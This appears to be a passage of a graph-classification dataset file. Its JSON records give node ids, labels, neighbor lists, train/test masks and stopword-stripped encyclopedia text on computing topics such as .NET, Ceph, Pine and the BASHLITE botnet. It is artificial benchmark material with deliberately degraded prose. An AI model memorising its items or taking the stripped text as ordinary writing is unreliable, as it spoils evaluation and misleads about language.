platform application development execution implementing core aspects .net framework within scope cli functions tied one language available across many languages supported framework .net framework includes common language runtime clr serves execution engine .net framework offers many services memory management type safety exception handling garbage collection security thread management programs written .net framework executed clr programs written .net framework compiled common intermediate language code cil opposed directly compiled machine code execution architecture-specific just-in-time compiler jit turns cil code machine code microsoft move .net core cli virtual execution system ves implementation known coreclr instead clr compiled cil code stored cli assemblies mandated specification assemblies stored portable executable pe file format common windows platform dynamic-link library dll executable exe files assembly consists one files one must contain manifest bearing metadata assembly complete name assembly confused file name disk contains simple text name version number culture public key token assemblies considered equivalent share complete name private key also used creator assembly strong naming public key token identifies private key assembly signed creator key pair typically person signing assembly sign assemblies strong name prior version assembly since creator possesses private key strong naming required add assemblies global assembly cache starting visual studio 2015 .net native compilation technology allows compilation .net code universal windows platform apps directly machine code rather cil code app must written either c visual basic.net .net framework includes implementation cli foundational standard libraries .net framework class library fcl organized hierarchy namespaces built-in application programming interfaces apis part either codice_1 codice_2 namespaces class libraries implement many common functions file reading writing graphic rendering database interaction xml document manipulation class libraries available cli compliant languages fcl implements cli base class library bcl class libraries—some specified cli microsoft specific bcl includes small subset entire class library core set classes serve basic api clr .net framework classes considered part bcl reside codice_3 codice_4 codice_5 bcl classes available .net framework well alternative implementations including .net compact framework microsoft silverlight .net core mono fcl refers entire class library ships .net framework includes expanded set libraries including bcl windows forms asp.net windows presentation foundation wpf also extensions base class libraries ado.net language integrated query linq windows communication foundation wcf workflow foundation wf fcl much larger scope standard libraries languages like c++ comparable scope standard libraries java introduction alternative implementations e.g. silverlight microsoft introduced concept portable class libraries pcl allowing consuming library run one platform proliferation .net platforms pcl approach failed scale pcls defined intersections api surface two platforms next evolutionary step pcl .net standard library created retroactively based codice_6 based apis found uwp silverlight new .net platforms encouraged implement version standard library allowing re-use extant third-party libraries run without new versions .net standard library allows independent evolution library app model layers within .net architecture nuget package manager .net platforms used retrieve third-party libraries .net project global library feed nuget.org private feeds maintained separately e.g. build server file system directory microsoft move .net core cli foundational class libraries implementation known corefx instead fcl atop class libraries multiple app models used create apps .net framework supports console windows forms windows presentation foundation asp.net asp.net core apps default app models offered alternative implementations .net framework console uwp asp.net core available .net core mono used power xamarin app models android ios macos retroactive architectural definition app models showed early 2015 also applied prior technologies like windows forms wpf microsoft introduced c++/cli visual studio 2005 language means compiling visual c++ programs run within .net framework parts c++ program still run within unmanaged visual c++ runtime specially modified parts translated cil code run .net framework clr assemblies compiled using c++/cli compiler termed mixed-mode assemblies since contain native managed code dll assemblies complex reverse engineer since .net decompilers .net reflector reveal managed code computer systems commonly require interaction newer older applications .net framework provides means access functions implemented newer older programs execute outside .net environment access component object model com components provided codice_7 codice_8 namespaces framework access functions via platform invocation services p/invoke access .net functions native applications via reverse p/invoke function .net framework introduces common type system cts defines possible data types programming constructs supported clr may may interact conforming cli specification feature .net framework supports exchange types object instances libraries applications written using conforming .net language cts clr used .net framework also enforce type safety prevents ill-defined casts wrong method invocations memory size issues accessing object also makes cli languages statically typed without type inference however starting .net framework 4.0 dynamic language runtime extended clr allowing dynamically typed languages implemented atop cli microsoft never implemented full framework system except microsoft windows engineered framework cross-platform implementations available operating systems see silverlight § alternative implementations microsoft submitted specifications cli includes core class libraries cts cil c c++/cli ecma international ecma international organization standardization iso making available official standards makes possible third parties create compatible implementations framework languages platforms .net framework security mechanism two general features code access security cas validation verification cas based evidence associated specific assembly typically evidence source assembly whether installed local machine downloaded internet cas uses evidence determine permissions granted code code demand calling code granted specified permission demand causes clr perform call stack walk every assembly method call stack checked required permission assembly granted permission security exception thrown managed cil bytecode easier reverse-engineer native code unless obfuscated decompiler programs enable developers reverse-engineering skills view source code behind unobfuscated .net assemblies contrast apps compiled native machine code much harder reverse-engineer source code almost never produced successfully mainly compiler optimizations lack reflection creates concerns business community possible loss trade secrets bypassing license control mechanisms mitigate microsoft included dotfuscator community edition visual studio .net since 2002 third-party obfuscation tools also available vendors vmware v.i labs turbo red gate software method-level encryption tools .net code available vendors safenet clr frees developer burden managing memory allocating freeing done handles memory management detecting memory safely freed instantiations .net types objects allocated managed heap pool memory managed clr long reference object exists may either direct via graph objects object considered use reference object exists reached used becomes garbage eligible collection .net framework includes garbage collector gc runs periodically separate thread application thread enumerates unusable objects reclaims memory allocated non-deterministic compacting mark-and-sweep garbage collector gc runs set amount memory used enough pressure memory system since guaranteed conditions reclaim memory reached gc runs non-deterministic .net application set roots pointers objects managed heap managed objects include references static objects objects defined local variables method parameters currently scope objects referred cpu registers gc runs pauses application object referred root recursively enumerates objects reachable root objects marks reachable uses cli metadata reflection discover objects encapsulated object recursively walk enumerates objects heap initially allocated contiguously using reflection objects marked reachable garbage mark phase since memory held garbage consequence considered free space however leaves chunks free space objects initially contiguous objects compacted together make free space managed heap contiguous reference object invalidated moving object updated gc reflect new location application resumed garbage collection ends latest version .net framework uses concurrent garbage collection along user code making pauses unnoticeable done background garbage collector used .net framework also generational objects assigned generation newly created objects tagged generation 0 objects survive one garbage collection tagged generation 1 generation 1 objects survive another collection generation 2 framework uses generation 2 objects higher generation objects garbage collected less often lower generation objects raises efficiency garbage collection older objects tend longer lifetimes newer objects ignoring older objects collection runs fewer checks compaction operations needed total application first launched .net framework compiles cil code executable code using just-in-time compiler caches executable program .net native image cache due caching application launches faster subsequent launches although first launch usually slower speed first launch developers may use native image generator utility manually ahead-of-time compile cache .net application garbage collector integrated environment introduce unanticipated delays execution developer little direct control large applications number objects garbage collector needs work become large means take long time visit rearrange .net framework provides support calling streaming simd extensions sse via managed code april 2014 visual studio 2013 update 2 however mono provided support simd extensions version 2.2 within namespace 2009 mono lead developer miguel de icaza expressed hope simd support adopted clr ecma standard streaming simd extensions available x86 cpus since introduction pentium iii architectures arm mips also simd extensions case cpu lacks support extensions instructions simulated software .net framework predominant implementation .net technologies implementations parts framework exist although runtime engine described ecma-iso specification implementations may encumbered patent issues iso standards may include disclaimer attention drawn possibility elements document may subject patent rights iso shall held responsible identifying patent rights harder develop alternatives fcl described open standard may subject copyright restrictions also parts fcl windows-specific functions behavior implementation non-windows platforms problematic alternative implementations parts framework listed microsoft managed code frameworks components licensed follows",
    "neighbors": [
      10243,
      6153,
      2063,
      8213,
      2083,
      8227,
      10281,
      44,
      4143,
      2101,
      8246,
      8262,
      10310,
      4173,
      4174,
      4178,
      83,
      2145,
      4194,
      10340,
      8296,
      4210,
      6265,
      8315,
      2181,
      2183,
      4231,
      2193,
      10388,
      4248,
      159,
      4255,
      2217,
      2221,
      10413,
      10414,
      2225,
      10428,
      190,
      6334,
      6335,
      2244,
      8391,
      200,
      6345,
      206,
      10447,
      214,
      6361,
      4316,
      6366,
      8414,
      4321,
      6370,
      4326,
      231,
      2279,
      6375,
      237,
      242,
      6398,
      2304,
      6411,
      8473,
      8476,
      4384,
      10546,
      2361,
      6458,
      315,
      10555,
      321,
      8524,
      337,
      4439,
      8539,
      349,
      2401,
      2402,
      4458,
      363,
      6506,
      8576,
      10624,
      4485,
      6536,
      2441,
      8597,
      4505,
      4507,
      6558,
      8607,
      10654,
      8609,
      430,
      10673,
      2487,
      6584,
      10684,
      2493,
      6594,
      461,
      463,
      10703,
      8659,
      6614,
      2519,
      4572,
      478,
      479,
      2529,
      489,
      6637,
      4590,
      6641,
      499,
      2556,
      2568,
      4624,
      10769,
      537,
      540,
      10783,
      8740,
      2603,
      6705,
      6709,
      10812,
      6717,
      2631,
      10828,
      10839,
      603,
      608,
      10848,
      2663,
      622,
      632,
      2680,
      4731,
      10877,
      10879,
      10886,
      8841,
      651,
      4747,
      653,
      6797,
      10900,
      10902,
      4771,
      6820,
      4775,
      10921,
      6828,
      2749,
      6860,
      8913,
      2782,
      2783,
      736,
      2786,
      4836,
      741,
      4840,
      10991,
      10993,
      2804,
      4853,
      8959,
      6920,
      6927,
      788,
      11030,
      8985,
      8988,
      2845,
      11038,
      2854,
      820,
      6972,
      4927,
      833,
      844,
      847,
      4944,
      853,
      11098,
      11105,
      2919,
      9063,
      9066,
      7026,
      2943,
      5003,
      5004,
      910,
      7064,
      9114,
      929,
      9121,
      11184,
      5048,
      960,
      11203,
      969,
      5067,
      11212,
      974,
      5078,
      9177,
      987,
      9196,
      11247,
      5104,
      9205,
      5117,
      5119,
      3076,
      11270,
      1041,
      9234,
      1043,
      11283,
      9245,
      3102,
      1055,
      9263,
      11316,
      1077,
      1083,
      3137,
      7234,
      1098,
      3159,
      5209,
      3170,
      5225,
      1136,
      7290,
      7292,
      7293,
      9340,
      11393,
      9348,
      5255,
      5259,
      9356,
      11414,
      3224,
      7326,
      7327,
      9377,
      3235,
      9380,
      9381,
      7341,
      3250,
      5300,
      5301,
      7351,
      9420,
      9424,
      9434,
      7389,
      9441,
      9442,
      3303,
      5354,
      11498,
      3308,
      1274,
      7421,
      11519,
      9487,
      5395,
      9491,
      3351,
      5401,
      7450,
      5403,
      11546,
      9505,
      5413,
      11559,
      7469,
      11570,
      11572,
      9525,
      3388,
      3394,
      1347,
      1348,
      11605,
      1366,
      5465,
      11616,
      11617,
      1379,
      7523,
      9593,
      9609,
      1418,
      9612,
      5521,
      11677,
      9631,
      11683,
      3496,
      11688,
      9655,
      1474,
      9671,
      7629,
      3535,
      1498,
      5594,
      3558,
      5612,
      9709,
      7664,
      3569,
      9714,
      7669,
      9726,
      9727,
      5643,
      5660,
      5666,
      9762,
      5669,
      1577,
      1581,
      3648,
      7753,
      7754,
      9801,
      9808,
      3667,
      9813,
      9819,
      5727,
      9839,
      7796,
      1656,
      3705,
      5754,
      9851,
      7807,
      5761,
      5765,
      9874,
      5779,
      9875,
      3734,
      3736,
      7838,
      7846,
      1703,
      1719,
      5819,
      5830,
      5833,
      7889,
      9940,
      9943,
      3800,
      9946,
      7906,
      1770,
      9964,
      3821,
      3834,
      1791,
      9988,
      3856,
      3857,
      5904,
      1813,
      5913,
      5921,
      5928,
      3881,
      10024,
      10026,
      10029,
      7983,
      1844,
      3894,
      7991,
      10039,
      1856,
      5952,
      3918,
      3922,
      10079,
      10083,
      3960,
      8059,
      6022,
      8080,
      8082,
      3990,
      6044,
      3997,
      1952,
      10145,
      8100,
      4010,
      10157,
      6062,
      4020,
      1978,
      10173,
      8126,
      8132,
      6088,
      6102,
      2010,
      8157,
      8161,
      6114,
      6115,
      6119,
      4074,
      8171,
      10229
    ],
    "mask": "Test"
  },
  {
    "node_id": 3574,
    "label": 7,
    "text": "Visma_Solutions:visma solutions visma solutions finnish joint stock company offers saas business software companies company provides professional services automation software visma severa valueframe e-accounting software visma netvisor budgeting forecasting software visma navita e-invoicing service maventa online signature service visma sign visma solutions part visma group visma solutions founded end year 2012 former joint stock company called netvisor named visma solutions netvisor founded markku nylund studied lappeenranta university technology 2000 netvisor merged bittivisio first version software launched 2002 since netvisor operating joint owned company responsible marketing r activities software 2011 netvisor part visma group end 2012 company ’ name changed visma solutions visma severa founded 2004 ari-pekka salovaara jari kärkkäinen studying lappeenranta university technology time 2010 company acquired visma 2013 part visma solutions company granted various accolades visma severa psa software optimized organizations pr advertising design engineering law architecture accounting firms visma severa used 700 professional companies worldwide main markets finland sweden norway visma netvisor e-accounting software used 20 000 companies software developed 10 years one pioneers field e-accounting saas software netvisor rewarded multiple times example 2005 netvisor ’ eaccounting service nominated world ’ best online service banks 2010 netvisor among ten fastest growing technology companies finland visma navita cloud-based service budgeting forecasting reporting business management data used navita based real-time figures updated directly accounting management systems maventa popular e-invoicing service nordics 150 000 users maventa connected existing erp-system used separate internet based software valueframe psa software suited architects advertising communication agencies consultants visma sign legally binding online signature service visma sign integrated online forms immediate signing used send signing invitations via email text messages",
    "neighbors": [
      1496
    ],
    "mask": "Test"
  },
  {
    "node_id": 3575,
    "label": 3,
    "text": "ARM_Cortex-A73:arm cortex-a73 arm cortex-a73 microarchitecture implementing armv8-a 64-bit instruction set designed arm holdings sophia design centre cortex-a73 2-wide decode out-of-order superscalar pipeline cortex-a73 serves successor cortex-a72 designed offer 30 greater performance 30 increased power efficiency design cortex-a73 based 32-bit armv7-a cortex-a17 emphasizing power efficiency sustained peak performance cortex-a73 primarily targeted mobile computing reviews cortex-a73 showed improved integer instructions per clock ipc though lower floating point ipc relative cortex-a72 cortex-a73 available sip core licensees design makes suitable integration sip cores e.g gpu display controller dsp image processor etc one die constituting system chip soc cortex-a73 also first arm core modified arm semi-custom 'built arm license kryo 280 first released semi-custom product though modifications made relative stock cortex-a73 announced hisilicon kirin 960 released 2016 utilizes 4 cortex-a73 cores clocked 2.36 ghz 'big cores big.little arrangement 4 'little arm cortex-a53 cores mediatek helio x30 utilizes 2 cortex-a73 cores 2.56 ghz 'big cores deca-core big.little arrangement 4 cortex-a53 4 cortex-a35 'little cores kryo 280 released march 2017 qualcomm snapdragon 835 uses modified cortex-a73 core soc utilizes 8 kryo 280 cores big.little arrangement two 4-core blocks clocked 2.456 ghz 1.906 ghz modifications made qualcomm relative stock cortex-a73 core unknown resulting kryo 280 core demonstrated increased integer ipc kryo 260 also used cortex-a73 cores though lower clock speeds kryo 280 combination cortex-a53 cores",
    "neighbors": [
      11282,
      9235,
      11289,
      1057,
      38,
      4139,
      8237,
      9774,
      2097,
      8250,
      8253,
      7745,
      7747,
      2635,
      99,
      8812,
      630,
      10361,
      638,
      644,
      9863,
      8842,
      146,
      659,
      7833,
      666,
      5786,
      6815,
      4258,
      4773,
      9913,
      8383,
      10945,
      4821,
      2788,
      3301,
      9964,
      1776,
      6391,
      3835,
      2814,
      781,
      6926,
      5417,
      810,
      2862,
      7988,
      11062,
      6971,
      10562,
      8003,
      6981,
      5963,
      1871,
      1872,
      9042,
      2388,
      6495,
      1377,
      11629,
      6001,
      373,
      8058,
      392,
      398,
      1428,
      4508,
      10658,
      5028,
      7077,
      9638,
      3511,
      9155,
      9163,
      7631,
      6608,
      980,
      9685,
      9174,
      10199,
      2524,
      9182,
      10734,
      1014
    ],
    "mask": "Test"
  },
  {
    "node_id": 3576,
    "label": 2,
    "text": "MSSTYLES:msstyles msstyles microsoft file format contains bitmaps metadata windows xp skinning engine first introduced windows whistler build 2250 engine unmodified state fully applies .msstyles files digitally signed microsoft luna zune theme default windows xp style known luna additional custom-made styles available internethowever digitally signed four signed styles include royale media center edition energy blue royale noir windows embedded standard ctp refresh zune style custom-made styles used using different methods means manual replacement automation executable files many popular freely distributed theme-patching executable files found online windows vista windows 7 also use .msstyles files skinning like aero.msstyles file however format files completely different .msstyles files transferable windows vista windows xp version .msstyles file contains png images metadata manual way replace three dll files uxtheme.dll shsvcs.dll themeui.dll use unsigned custom visual styles windows vista",
    "neighbors": [
      11283,
      6972,
      6797
    ],
    "mask": "Test"
  },
  {
    "node_id": 3577,
    "label": 9,
    "text": "Comparison_of_Java_and_C++:comparison java c++ comparison java c++ two prominent object-oriented programming languages differences programming languages c++ java traced heritage different design goals c++ designed systems applications programming i.e infrastructure programming extending procedural programming language c designed efficient execution c c++ added support object-oriented programming exception handling lifetime-based resource management raii generic programming template metaprogramming c++ standard library includes generic containers algorithms standard template library stl many general purpose facilities java general-purpose concurrent class-based object-oriented programming language designed minimize implementation dependencies relies java virtual machine secure highly portable bundled extensive library designed provide full abstraction underlying platform java statically typed object-oriented language uses syntax similar incompatible c++ includes documentation system called javadoc different goals development c++ java resulted different principles design trade-offs languages differences follows c++ java provide facilities generic programming templates generics respectively although created solve similar kinds problems similar syntax quite different example comparing exists wikibooks addition running compiled java program computers running java applications generally must also run java virtual machine jvm compiled c++ programs run without external applications early versions java significantly outperformed statically compiled languages c++ program statements two closely related languages may compile machine instructions c++ compiling several byte codes involving several machine instructions interpreted jvm example since performance optimizing complex issue difficult quantify performance difference c++ java general terms benchmarks unreliable biased given different natures languages definitive qualitative differences also difficult draw nutshell inherent inefficiencies hard limits optimizing java given heavily relies flexible high-level abstractions however use powerful jit compiler modern jvm implementations mitigate issues case inefficiencies java great compiled c c++ code called java via jni inefficiencies inherent java language include mainly however number benefits java design realized theorized also performance problems occur c++ c++ language defined iso/iec 14882 iso standard published iso/iec jtc1/sc22/wg21 committee latest post-standardization draft c++11 available well c++ language evolves via open steering committee called c++ standards committee committee composed creator c++ bjarne stroustrup convener herb sutter prominent figures including many representatives industries user-groups i.e. stake-holders open committee anyone free join participate contribute proposals upcoming releases standard technical specifications committee aims release new standard every years although past strict review processes discussions meant longer delays publication new standards 1998 2003 2011 java language defined java language specification book published oracle java language continuously evolves via process called java community process world programming community represented group people organizations java community members—which actively engaged enhancement language sending public requests java specification requests must pass formal public reviews get integrated language lack firm standard java somewhat volatile nature specifications constant source criticism stake-holders wanting stability conservatism addition new language library features contrast c++ committee also receives constant criticism opposite reason i.e. strict conservative taking long release new versions c++ trademark company organization owned individual java trademark oracle corporation",
    "neighbors": [
      2304,
      9345,
      10242,
      3076,
      5896,
      1931,
      2316,
      3725,
      4747,
      6414,
      6160,
      5521,
      6797,
      10510,
      3736,
      11674,
      155,
      541,
      3871,
      8609,
      1954,
      5796,
      5677,
      5806,
      7983,
      9008,
      435,
      9780,
      3765,
      823,
      3767,
      7479,
      9272,
      10043,
      10684,
      9921,
      1474,
      963,
      8262,
      5961,
      1610,
      1611,
      9804,
      8397,
      11212,
      6098,
      11219,
      1236,
      5588,
      7894,
      4057,
      2138,
      7421,
      4572,
      10333,
      10586,
      479,
      4960,
      4069,
      7274,
      5612,
      1776,
      5872,
      6640,
      9714,
      502,
      1016,
      380,
      2045,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 3578,
    "label": 5,
    "text": "Pine_(email_client):pine email client pine freeware text-based email client developed university washington first version written 1989 announced public march 1992 source code available unix version license written university washington pine longer development replaced alpine client available apache license unix windows linux versions pine unix/linux version text user interface based—its message editor inspired text editor pico windows formerly dos version called pc-pine webpine available individuals associated university washington students faculty etc —a version pine implemented web application moved alpine however still many users software many people believe pine stands pine elm one original authors laurence lundblade insists never case started simply word acronym first choice backronym pine would pine nearly elm time changed university mean program internet news e-mail original announcement said pine originally based elm evolved much since 'pine no-longer elm version 3.91 pine license similar bsd stated university registered trademark pine name respect computer programs used communication electronic mail applications march 1995 version 3.92 holder copyright university washington changed license even source code still available allow modifications changes pine distributed anyone also claimed even old license never allowed distribution modified versions trademark pine name part position matter reaction developers forked version 3.91 name mana mail news agent avoid trademark issue gnu project adopted gnu mana richard stallman claims university washington threatened sue free software foundation distributing modified pine program resulting development mana ceasing versions released pico clone gnu nano also written due change licensing terms pine pico explained nano author blog post criticizing license 2001 university washington later modified license somewhat allow unmodified distribution pine alongside collections free software license still conform open source free software guidelines semi-free software effectively proprietary software 2006 university washington announced stopped development pine pine 4.64 although pine continues supported place new family email tools based upon pine called alpine licensed apache license version 2 november 29 2006 saw first public alpha release forms new approach since alpha test pine always non-public alpine 1.0 publicly released december 20 2007 recent version 2.21.9 released september 19 2017",
    "neighbors": [
      1664,
      9986,
      3465,
      6797,
      9747,
      3350,
      11418,
      9642,
      7983,
      1075,
      2101,
      9909,
      823,
      3015,
      10956,
      10450,
      6231,
      7255,
      9320,
      9451,
      11500,
      10861,
      9459,
      5492,
      119,
      8443,
      7036
    ],
    "mask": "None"
  },
  {
    "node_id": 3579,
    "label": 9,
    "text": "Personal_Printer_Data_Stream:personal printer data stream personal printer data stream general name family page description language used ibm printers includes proprinter quietwriter quickwriter laserprinter 4019 laserprinter 4029 commands ppds introduced control printers 1981 launch ibm graphics printer 5152 originally called ibm ascii proprinter quickwriter quietwriter data stream name changed ppds ibm laserprinter introduced 1989 ppds different levels functions upward compatible although many laser inkjet printers support ppds support binary printer languages still use esc syntax include printer command language versions 1 5 epson esc/p command set level 1 basic level ppds providing basic services needed printer level represented 9- 24-pin proprinter family printers within level typical differences among printers follows level 2 incorporates enhancements font selection print quality selection paper handling level represented quietwriter quickwriter family products following commands enable use enhancements level 3 provides enhancements previous ppds levels page type printers ibm laserprinter 4019 enhancements level 4 adds new features ibm laserprinter 4029 previous ppds levels features include compression scalable fonts enhanced orientations languages define different printable areas given physical medium pcl ppds use different characteristics orders searching substitute font pcl uses ascii-encoded numerical values command parameters ppds uses binary encoded parameters several modern lexmark printers example lexmark ms510/610 series mfp mx511/611 series support ppds level 4 order provide high level support legacy applications written specifically ibm 4019 4029 laser printers",
    "neighbors": [
      10960,
      8763,
      6830
    ],
    "mask": "None"
  },
  {
    "node_id": 3580,
    "label": 5,
    "text": "UNIStim:unistim unistim unified networks ip stimulus deprecated telecommunications protocol developed nortel acquired avaya ip phone terminals soft phones ip pbx communications manufacturers ip pbx equipment aastra alcatel avaya ... followed path developing proprietary protocols protocols gradually replaced complemented standardized protocols including h.323 especially sip protocols works master slave mode operations simply reflect basic actions user perform terminal press button commands sent display network terminal turn light display message stimulus implement easily new facility telephone without modify software embedded terminals simplifies procedures maintenance upgrade installed base sense stimulus protocols differ functional protocols sip h.323 impose one hand service defined standard terminal loads specific logic corresponding service question approach allows manufacturers quickly deliver wide range services without wait services standardized nortel active standardization effort protocols within ietf drawing work pre-standard unistim already developed work nortel ip pbx systems ip centrex platforms 1996 contributions common nortel cisco systems example culminated publication ietf rfc 3054 media gateway ip phone application profile outlining options protocol megaco/h.248 ip command posts unistim protocol implemented avaya ip pbx systems licensed third-party suppliers → history see example release company spectralink details implementation protocol unistim available document telephony data network services telephone filed united states patent 7068641 may 7 1999 secure unistim protocol implemented as5300 cs2100 enables encryption unistim protocol use smc 2450",
    "neighbors": [
      10242,
      9603,
      1284,
      3847,
      649,
      9868,
      3218,
      9365,
      10005,
      1303,
      11286,
      11413,
      5402,
      5531,
      3742,
      10271,
      9380,
      2085,
      9381,
      3751,
      3752,
      10924,
      562,
      6834,
      2996,
      9909,
      10171,
      4797,
      3133,
      3006,
      5181,
      5437,
      10175,
      7364,
      2887,
      5576,
      8265,
      2509,
      4687,
      9937,
      5843,
      2904,
      5469,
      5470,
      5471,
      5472,
      10341,
      10344,
      11112,
      367,
      7407,
      8432,
      5490,
      6651
    ],
    "mask": "Test"
  },
  {
    "node_id": 3581,
    "label": 4,
    "text": "BASHLITE:bashlite bashlite also known gafgyt lizkebab qbot torlus lizardstresser malware infects linux systems order launch distributed denial-of-service attacks ddos originally also known name bashdoor term refers exploit method used malware used launch attacks 400 gbps original version 2014 exploited flaw bash shell shellshock software bug exploit devices running busybox months later variant detected could also infect vulnerable devices local network 2015 source code leaked causing proliferation different variants 2016 reported one million devices infected identifiable devices participating botnets august 2016 almost 96 percent iot devices 95 percent cameras dvrs roughly 4 percent home routers less 1 percent compromised linux servers bashlite written c designed easily cross-compile various computer architectures exact capabilities differ variants common features generate several different types ddos attacks hold open tcp connections send random string junk characters tcp udp port repeatedly send tcp packets specified flags may also mechanism run arbitrary shell commands infected machine facilities reflected amplification attacks bashlite uses client–server model command control protocol used communication essentially lightweight version internet relay chat irc even though supports multiple command control servers variants single command control ip-address hardcoded propagates via brute forcing using built-in dictionary common usernames passwords malware connects random ip addresses attempts login successful logins reported back command control server",
    "neighbors": [
      3072,
      5251,
      516,
      7556,
      2060,
      3724,
      3347,
      4883,
      2325,
      278,
      9087,
      11413,
      793,
      3867,
      2717,
      9630,
      10657,
      4648,
      4522,
      9727,
      10924,
      46,
      2222,
      7983,
      823,
      10297,
      7996,
      11583,
      9536,
      9664,
      2754,
      3395,
      8386,
      8133,
      9154,
      10952,
      6347,
      2508,
      9932,
      81,
      8789,
      11351,
      10457,
      7515,
      988,
      3807,
      8032,
      2409,
      10477,
      4462,
      10875,
      2045,
      5886,
      127
    ],
    "mask": "Test"
  },
  {
    "node_id": 3582,
    "label": 6,
    "text": "Ceph_(software):ceph software computing ceph pronounced free-software storage platform implements object storage single distributed computer cluster provides interfaces object- block- file-level storage ceph aims primarily completely distributed operation without single point failure scalable exabyte level freely available ceph replicates data makes fault-tolerant using commodity hardware requiring specific hardware support result design system self-healing self-managing aiming minimize administration time costs ceph employs five distinct kinds daemons fully distributed may run set servers clients different use cases directly interact different subsets ceph striping individual files across multiple nodes achieve higher throughput similar raid0 stripes partitions across multiple hard drives adaptive load balancing supported whereby frequently accessed objects replicated nodes bluestore default recommended storage type production environments ceph storage implementation providing better latency configurability filestore backend avoiding shortcomings filesystem based storage involving additional processing caching layers filestore backend still considered useful stable xfs recommended underlying filesystem type production environments btrfs recommended non-production environments ext4 filesystems recommended resulting limitations maximum rados objects length ceph implements distributed object storage ceph software libraries provide client applications direct access reliable autonomic distributed object store rados object-based storage system also provide foundation ceph features including rados block device rbd rados gateway ceph file system librados software libraries provide access c c++ java php python rados gateway also exposes object store restful interface present native amazon s3 openstack swift apis ceph object storage system allows users mount ceph thin-provisioned block device application writes data ceph using block device ceph automatically stripes replicates data across cluster ceph rados block device rbd also integrates kernel-based virtual machines kvms ceph rbd interfaces ceph object storage system provides librados interface cephfs file system stores block device images objects since rbd built librados rbd inherits librados abilities including read-only snapshots revert snapshot striping images across cluster ceph improves read access performance large block device images block device virtualized providing block storage virtual machines virtualization platforms apache cloudstack openstack opennebula ganeti proxmox virtual environment ceph file system cephfs runs top object storage system provides object storage block device interfaces ceph metadata server cluster provides service maps directories file names file system objects stored within rados clusters metadata server cluster expand contract rebalance file system dynamically distribute data evenly among cluster hosts ensures high performance prevents heavy loads specific hosts within cluster clients mount posix-compatible file system using linux kernel client older fuse-based client also available servers run regular unix daemons ceph initially created sage weil doctoral dissertation advised professor scott a. brandt jack baskin school engineering university california santa cruz ucsc sponsored advanced simulation computing program asc including los alamos national laboratory lanl sandia national laboratories snl lawrence livermore national laboratory llnl first line code ended part ceph written sage weil 2004 summer internship llnl working scalable filesystem metadata management known today ceph mds 2005 part summer project initiated scott a. brandt led carlos maltzahn sage weil created fully functional file system prototype adopted name ceph ceph made debut sage weil giving two presentations november 2006 one usenix osdi 2006 another sc'06 graduation fall 2007 weil continued work ceph full-time core development team expanded include yehuda sadeh weinraub gregory farnum march 19 2010 linus torvalds merged ceph client linux kernel version 2.6.34 released may 16 2010 2012 weil created inktank storage professional services support ceph april 2014 red hat purchased inktank bringing majority ceph development in-house october 2015 ceph community advisory board formed assist community driving direction open source software-defined storage technology charter advisory board includes ceph community members global organizations committed ceph project including individuals canonical cern cisco fujitsu intel red hat sandisk suse name ceph abbreviation cephalopod class molluscs includes octopus name emphasized logo suggests highly parallel behavior octopus chosen associate file system sammy banana slug mascot ucsc cephalopods banana slugs molluscs",
    "neighbors": [
      5120,
      2564,
      6669,
      3598,
      1553,
      10257,
      9236,
      6677,
      5142,
      8214,
      1049,
      3611,
      10272,
      9249,
      9762,
      5158,
      5677,
      7225,
      11323,
      8772,
      9285,
      1109,
      2135,
      5723,
      4708,
      8298,
      9836,
      7789,
      9333,
      6263,
      9335,
      4729,
      5755,
      9343,
      9353,
      7818,
      654,
      2193,
      2194,
      6291,
      2197,
      2199,
      11419,
      6309,
      1190,
      5286,
      10405,
      10921,
      5293,
      7344,
      2230,
      5816,
      1212,
      8380,
      3265,
      6851,
      9420,
      6352,
      10961,
      7378,
      3795,
      4819,
      8402,
      8404,
      728,
      8410,
      4829,
      6365,
      739,
      7907,
      8938,
      1263,
      3312,
      9455,
      3826,
      2291,
      246,
      8439,
      3834,
      3323,
      253,
      3328,
      11012,
      1801,
      2314,
      11017,
      8461,
      6416,
      1810,
      6935,
      11033,
      287,
      1825,
      802,
      6434,
      5413,
      4390,
      3368,
      4907,
      9004,
      302,
      7983,
      6963,
      1844,
      823,
      6970,
      11072,
      3909,
      2378,
      7499,
      4431,
      5969,
      346,
      2395,
      3931,
      2397,
      8539,
      4961,
      5988,
      10596,
      2407,
      10087,
      8554,
      11638,
      6519,
      376,
      11128,
      890,
      11643,
      10111,
      2432,
      7554,
      8075,
      7565,
      6545,
      5013,
      11675,
      11676,
      2974,
      7070,
      10151,
      4012,
      1454,
      6062,
      9137,
      8114,
      7603,
      8631,
      1464,
      1978,
      10172,
      6591,
      11201,
      8643,
      8644,
      9677,
      2015,
      8671,
      1509,
      9189,
      5096,
      1517,
      7663,
      11256,
      2555,
      2045
    ],
    "mask": "Train"
  },
  {
    "node_id": 3583,
    "label": 4,
    "text": "Jtest:jtest jtest automated java software testing static analysis product made parasoft product includes technology data-flow analysis unit test-case generation execution static analysis regression testing code coverage runtime error detection jtest used companies cisco systems transcore aig united guaranty wipro technologies also known used lockheed martin f-35 joint strike fighter program jsf jtest 19th dr.dobb jolt product excellence productivity awards security tool category part parasoft application security solution previously jtest granted codie award software information industry association siia best software testing solution 2007 2005 also technology year award best application test tool infoworld two years row 2006 2007 jtest first received jolt award excellence 2000",
    "neighbors": [
      2465,
      2658,
      9509,
      11208,
      4171,
      823,
      6797,
      7983,
      6834,
      6998,
      1687,
      11446,
      1689
    ],
    "mask": "None"
  },
  {
    "node_id": 3584,
    "label": 7,
    "text": "Connection_broker:connection broker software engineering connection broker resource manager manages pool connections connection-based resources databases remote desktops enabling rapid reuse connections short-lived processes without overhead setting new connection time connection brokers often used systems using n-tier architectures remote desktop connection brokers perform variety tasks including",
    "neighbors": [
      2901,
      5535
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3585,
    "label": 3,
    "text": "Nvidia_Jetson:nvidia jetson nvidia jetson series embedded computing boards nvidia jetson tk1 tx1 tx2 models carry tegra processor soc nvidia integrates arm architecture central processing unit cpu jetson low-power system designed accelerating machine learning applications jetson family includes following boards published performance modes nvidia jetson tx2 published operation modes nvidia jetson nano various operating systems software might able run jetson board series jetpack software development kit sdk nvidia jetson board series official nvidia download page bears entry jetpack 3.2 uploaded 2018-03-08 states even qnx widely announced jetson platform still success reports installing running specific qnx packages certain nvidia jetson board variants namely package qnx-v3q-23.16.01 seemingly parts based nvidia vibrante linux distribution reported run jetson tk1 pro board",
    "neighbors": [
      1537,
      3203,
      2308,
      11396,
      6925,
      9489,
      1682,
      11282,
      405,
      10393,
      666,
      5019,
      4124,
      6178,
      8237,
